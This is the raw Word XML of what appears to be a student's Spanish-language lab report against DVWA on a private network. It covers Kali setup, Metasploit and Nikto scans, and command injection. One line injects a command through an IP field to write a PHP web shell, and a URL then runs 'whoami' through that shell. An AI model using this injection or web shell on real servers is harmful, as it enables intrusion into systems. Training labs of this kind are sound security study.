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0E0F1B" w14:textId="07B174F1" w:rsidR="009200E1" w:rsidRDefault="00704E4A">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Configuración del adaptador</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD5C59C" w14:textId="2F38CC9A" w:rsidR="004E4C2E" w:rsidRDefault="009200E1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62313009" wp14:editId="652092A1">
            <wp:extent cx="5400040" cy="3648710"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="418986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9861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4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CDC1C" w14:textId="77777777" w:rsidR="00704E4A" w:rsidRDefault="00704E4A"/>
    <w:p w14:paraId="1AE7019B" w14:textId="3B94B01C" w:rsidR="00704E4A" w:rsidRDefault="00704E4A">
      <w:r>
        <w:t>Utilizamos Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C45364" w14:textId="0D8B5037" w:rsidR="009200E1" w:rsidRDefault="009200E1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34910AD3" wp14:editId="0772B644">
            <wp:extent cx="5400040" cy="3040380"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="832495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495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4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49FD4" w14:textId="77777777" w:rsidR="009200E1" w:rsidRDefault="009200E1"/>
    <w:p w14:paraId="764BDF89" w14:textId="77777777" w:rsidR="009200E1" w:rsidRDefault="009200E1"/>
    <w:p w14:paraId="342400DC" w14:textId="77777777" w:rsidR="009200E1" w:rsidRDefault="009200E1"/>
    <w:p w14:paraId="4CA0116F" w14:textId="77777777" w:rsidR="009200E1" w:rsidRDefault="009200E1"/>
    <w:p w14:paraId="5A1265F0" w14:textId="77777777" w:rsidR="009200E1" w:rsidRDefault="009200E1"/>
    <w:p w14:paraId="64A6A322" w14:textId="77777777" w:rsidR="009200E1" w:rsidRDefault="009200E1"/>
    <w:p w14:paraId="0CC9133D" w14:textId="0E8213A8" w:rsidR="009200E1" w:rsidRDefault="009200E1">
      <w:r>
        <w:t>Ping para comprobar visibilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D6C74A" w14:textId="47C9ED09" w:rsidR="009200E1" w:rsidRDefault="009200E1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28974ECF" wp14:editId="5916A041">
            <wp:extent cx="4514850" cy="1610247"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2598606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86069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26341" cy="161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41AC8" w14:textId="0C0F4633" w:rsidR="009200E1" w:rsidRDefault="009200E1"/>
    <w:p w14:paraId="6E2A31AC" w14:textId="518B5170" w:rsidR="009200E1" w:rsidRDefault="009200E1">
      <w:r>
        <w:t xml:space="preserve">Iniciación </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0691FEEE" w14:textId="33859FF2" w:rsidR="009200E1" w:rsidRDefault="009200E1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2855E181" wp14:editId="242D36D8">
            <wp:extent cx="4600575" cy="3116100"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="13759041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90410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11671" cy="312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FEB01" w14:textId="77777777" w:rsidR="003B6ED4" w:rsidRDefault="003B6ED4"/>
    <w:p w14:paraId="341A79D4" w14:textId="77777777" w:rsidR="003B6ED4" w:rsidRDefault="003B6ED4"/>
    <w:p w14:paraId="0506565E" w14:textId="77777777" w:rsidR="003B6ED4" w:rsidRDefault="003B6ED4"/>
    <w:p w14:paraId="726793AB" w14:textId="77777777" w:rsidR="00704E4A" w:rsidRDefault="00704E4A">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28371574" w14:textId="77777777" w:rsidR="00704E4A" w:rsidRDefault="00704E4A">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A8AFC89" w14:textId="4A8C933D" w:rsidR="00704E4A" w:rsidRDefault="00704E4A">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Escaneo de puertos </w:t>
      </w:r>
      <w:r w:rsidR="003B6ED4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>con metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465E8B39" w14:textId="1D723FDE" w:rsidR="00704E4A" w:rsidRDefault="00704E4A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="248B7806" wp14:editId="15F0E0C6">
            <wp:extent cx="4657725" cy="2657488"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2972979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29798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66613" cy="2662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39F55" w14:textId="77777777" w:rsidR="00704E4A" w:rsidRDefault="00704E4A"/>
    <w:p w14:paraId="22D0BF92" w14:textId="411D4FE1" w:rsidR="003B6ED4" w:rsidRDefault="003B6ED4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C8E518B" wp14:editId="4EF84572">
            <wp:extent cx="4810125" cy="481918"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4965313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53131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58233" cy="486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524AF" w14:textId="77777777" w:rsidR="003B6ED4" w:rsidRDefault="003B6ED4">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AF6E667" w14:textId="77777777" w:rsidR="003B6ED4" w:rsidRDefault="003B6ED4">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74CA916C" w14:textId="77777777" w:rsidR="003B6ED4" w:rsidRDefault="003B6ED4">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36AE1EC0" w14:textId="206DAB94" w:rsidR="003B6ED4" w:rsidRDefault="003B6ED4">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Colocar ip en el navegador</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9CEF60" w14:textId="1288697D" w:rsidR="00704E4A" w:rsidRDefault="00704E4A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F59D4D7" wp14:editId="050B40A3">
            <wp:extent cx="4619625" cy="2812300"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="19260576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0576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26833" cy="2816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8D2EC" w14:textId="77777777" w:rsidR="003B6ED4" w:rsidRDefault="003B6ED4"/>
    <w:p w14:paraId="597B1190" w14:textId="77777777" w:rsidR="003B6ED4" w:rsidRDefault="003B6ED4"/>
    <w:p w14:paraId="4512A7DC" w14:textId="77777777" w:rsidR="00AF69E0" w:rsidRDefault="00AF69E0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F01D9BE" w14:textId="0DB3C82A" w:rsidR="003B6ED4" w:rsidRDefault="003B6ED4">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Escaneo con Nikton</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4689F0" w14:textId="140E83CB" w:rsidR="003B6ED4" w:rsidRDefault="003B6ED4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BE2BBC5" wp14:editId="421E8FF2">
            <wp:extent cx="5400040" cy="1143000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10225038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50387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FA0A8" w14:textId="77777777" w:rsidR="00B177C8" w:rsidRDefault="00B177C8"/>
    <w:p w14:paraId="3213834C" w14:textId="77777777" w:rsidR="00B177C8" w:rsidRDefault="00B177C8"/>
    <w:p w14:paraId="05DAB91D" w14:textId="4EFCB988" w:rsidR="009200E1" w:rsidRDefault="000F3F43">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000F3F43">
        <w:t>192.168.0.91;echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000F3F43">
        <w:t xml:space="preserve"> '&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F3F43">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F3F43">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F3F43">
        <w:t>system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F3F43">
        <w:t>($_GET["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F3F43">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F3F43">
        <w:t>"])</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000F3F43">
        <w:t>; ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000F3F43">
        <w:t>&gt;' &gt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F3F43">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F3F43">
        <w:t>/www/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F3F43">
        <w:t>html</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F3F43">
        <w:t>/DVWA/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F3F43">
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1EF5E5FF" w14:textId="1C74AEF9" w:rsidR="009200E1" w:rsidRDefault="000F3F43">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43695A14" wp14:editId="6237772C">
            <wp:extent cx="5400040" cy="2319020"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="11441334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13344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1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D021C" w14:textId="77777777" w:rsidR="000F3F43" w:rsidRDefault="000F3F43"/>
    <w:p w14:paraId="281A33BE" w14:textId="68738827" w:rsidR="000F3F43" w:rsidRDefault="000F3F43">
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00625739">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://192.168.0.91/DVWA/shell.php?cmd=whoami</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2D76D8AE" w14:textId="2E56EB8C" w:rsidR="000F3F43" w:rsidRDefault="000F3F43">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57971F3E" wp14:editId="2B171FF4">
            <wp:extent cx="5400040" cy="763270"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19617508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75086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6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FAE00" w14:textId="77777777" w:rsidR="00F2345C" w:rsidRDefault="00F2345C"/>
    <w:p w14:paraId="719900AD" w14:textId="77777777" w:rsidR="00F2345C" w:rsidRDefault="00F2345C"/>
    <w:p w14:paraId="6595FCA3" w14:textId="77777777" w:rsidR="00F2345C" w:rsidRDefault="00F2345C"/>
    <w:p w14:paraId="05650A0F" w14:textId="6DE68568" w:rsidR="00F2345C" w:rsidRDefault="00F2345C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F2345C">
        <w:t>curl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F2345C">
        <w:t xml:space="preserve"> -l http://192.168.0.91</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2FAA6F" w14:textId="641F8C37" w:rsidR="009200E1" w:rsidRDefault="00F2345C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2952FF23" wp14:editId="283AFB06">
            <wp:extent cx="5400040" cy="2326640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8428799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87997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26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200E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00E1"/>
    <w:rsid w:val="000F3F43"/>
    <w:rsid w:val="00212F3E"/>
    <w:rsid w:val="003B6ED4"/>
    <w:rsid w:val="004960CC"/>
    <w:rsid w:val="004E4C2E"/>
    <w:rsid w:val="00656F83"/>
    <w:rsid w:val="00704E4A"/>
    <w:rsid w:val="008A57ED"/>
    <w:rsid w:val="009200E1"/>
    <w:rsid w:val="00AF69E0"/>
    <w:rsid w:val="00B177C8"/>
    <w:rsid w:val="00B4126A"/>
    <w:rsid w:val="00DA6824"/>
    <w:rsid w:val="00E458F5"/>
    <w:rsid w:val="00F234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27FFE6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{35F2F104-42C6-458A-9F84-CFC4307951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200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200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200E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200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200E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200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200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200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200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200E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200E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200E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200E1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200E1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200E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200E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200E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200E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200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200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200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200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200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200E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200E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200E1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200E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200E1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200E1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0F3F43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F3F4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hyperlink" Target="https://192.168.0.91/DVWA/shell.php?cmd=whoami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1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5</Pages>
  <Words>68</Words>
  <Characters>376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2-DAW</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>2-DAW</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-27T12:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-27T13:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>